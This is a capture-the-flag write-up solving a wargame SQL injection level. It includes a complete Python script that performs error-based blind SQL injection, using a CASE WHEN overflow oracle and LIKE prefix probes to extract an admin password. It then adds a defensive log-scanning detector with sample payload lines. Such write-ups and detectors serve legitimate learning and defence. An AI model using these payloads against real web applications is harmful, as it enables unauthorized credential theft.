frankenstein
This is the first screen.

I recognized it as an Error-based Blind SQL Injection problem and solved it on that basis.
The Python code I wrote is as follows.
```python
import requests
import string

URL = 'https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw='
PHPSESSID = 'MY_PHPSESSID'
# When the injected condition is true the server evaluates 9999999999*9999999999,
# which overflows and makes the page print an error; that error text is the oracle.
TRUE_PHRASE = '<br>error'


def query(payload):
    """Send one probe and report whether the error-based oracle fired."""
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 0dc4efbb
def find_pw():
    """Recover the admin password one character at a time with LIKE prefix probes."""
    pw = ''
    while True:
        found = False
        for character in string.printable:
            # Skip characters that would break the payload or act as LIKE wildcards.
            if character in "#%&'_":
                continue
            elif query("' or case when id='admin' and pw like '{}{}%25' then 9999999999*9999999999 else 0 end%23".format(pw, character)) is True:
                pw += character
                found = True
                break
        # No candidate extended the prefix: the full password has been recovered.
        if found is False:
            break
    print('pw: {}'.format(pw))


find_pw()
```
Running it, pw turns out to be 0dc4efbb.
Visiting https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw=0dc4efbb solves the challenge.
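From the defender's side, the enumeration above leaves a distinctive trace in web-server logs: a CASE WHEN oracle, a LIKE prefix that grows by one character per request, a huge multiplication meant to force an integer-overflow error, and a trailing comment. The detector below is an added example, not part of the original writeup; the access-log lines, the /chall/frankenstein.php path and the indicator names are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not from the writeup): one normal request,
# then three from a client walking the password prefix one character at a time
# with the same case/when + overflow payload shape used above.
PAYLOAD = ("%27%20or%20case%20when%20id%3D%27admin%27%20and%20pw%20like%20"
           "%27{}%25%27%20then%209999999999*9999999999%20else%200%20end%23")
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /chall/frankenstein.php?pw=0dc4efbb HTTP/1.1" 200 512',
] + [
    '10.0.0.9 - - [01/Jan/2024:10:00:0%d +0000] "GET /chall/frankenstein.php?pw=%s HTTP/1.1" 200 640'
    % (i + 1, PAYLOAD.format(prefix)) for i, prefix in enumerate(["0", "0d", "0dc"])
])

# Common log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Indicators of the error-based blind technique: a CASE WHEN oracle, a LIKE prefix
# probe, a multiplication large enough to overflow BIGINT, and a query comment
# used to discard the rest of the original statement.
INDICATORS = {
    "case-when-oracle": re.compile(r"\bcase\s+when\b", re.I),
    "like-prefix-probe": re.compile(r"\blike\s*'[^']*%'", re.I),
    "integer-overflow": re.compile(r"\b\d{10,}\s*\*\s*\d{10,}\b"),
    "query-comment": re.compile(r"(#|--\s|/\*)"),
}


def indicators_for(decoded_query):
    """Return the names of every indicator present in a URL-decoded query string."""
    return [name for name, rx in INDICATORS.items() if rx.search(decoded_query)]


def scan_log(text):
    """Flag requests showing a CASE WHEN oracle plus at least one other indicator,
    and count flagged requests per client: a burst from one IP is the enumeration."""
    flagged, by_client = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        hits = indicators_for(unquote(urlsplit(target).query))
        if "case-when-oracle" in hits and len(hits) >= 2:
            flagged.append((ip, hits))
            by_client[ip] += 1
    return {"flagged": flagged, "by_client": by_client}
```

Decoding the query string before matching matters: the writeup sends `%25` and `%23`, so the raw log line never contains the literal `%` wildcard or `#` comment.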
